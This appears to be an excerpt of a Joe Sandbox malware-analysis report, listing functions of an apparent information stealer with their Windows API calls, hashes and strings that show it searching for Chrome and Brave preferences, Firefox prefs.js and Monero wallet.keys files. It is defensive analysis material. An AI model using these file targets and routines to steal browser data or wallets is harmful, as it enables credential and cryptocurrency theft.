                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                          • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                          • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                          • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                          Function 00414910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0041492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                          • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                          • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                          • FindClose.KERNEL32(000000FF), ref: 00414B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                          • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                          • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                          • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                          Function 00414570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00414587
                          • wsprintfA.USER32 ref: 004145A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                          • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                          • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                          • FindClose.KERNEL32(000000FF), ref: 004146A0
                          • lstrcat.KERNEL32(?,0128E4D0), ref: 004146C5
                          • lstrcat.KERNEL32(?,0128D0D8), ref: 004146D8
                          • lstrlen.KERNEL32(?), ref: 004146E5
                          • lstrlen.KERNEL32(?), ref: 004146F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                          • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                          • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                          • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                          Function 00413EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00413EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                          • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                          • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                          • FindClose.KERNEL32(000000FF), ref: 00414081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                          • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                          • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                          • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                          Function 0040ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0040ED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                          • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                          • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                          • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                          • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                          • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                          • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                          Function 0040F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                          • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                          • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                          • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                          • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                          • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                          • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                          Function 004016D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042510C,?,?,?,004251B4,?,?,00000000,?,00000000), ref: 00401923
                          • StrCmpCA.SHLWAPI(?,0042525C), ref: 00401973
                          • StrCmpCA.SHLWAPI(?,00425304), ref: 00401989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                          • FindClose.KERNEL32(000000FF), ref: 00401E32
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: 5ea82217d710e172e365d67747ade50ceb9e1d6b8b6faf2988abcee8d56b9610
                          • Instruction ID: 39d00e11cde3818330ac08f623c81c852c64dcafcc1d6f8b5eceb62ce14d4984
                          • Opcode Fuzzy Hash: 5ea82217d710e172e365d67747ade50ceb9e1d6b8b6faf2988abcee8d56b9610
                          • Instruction Fuzzy Hash: F51260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                          Function 0040DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                          • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                          • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                          • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                          • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                          • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                          • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                          Function 0040DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                          • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                          • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                          • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                          • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                          • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                          • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                          Function 007CF962 Relevance: 12.9, Strings: 9, Instructions: 1629COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
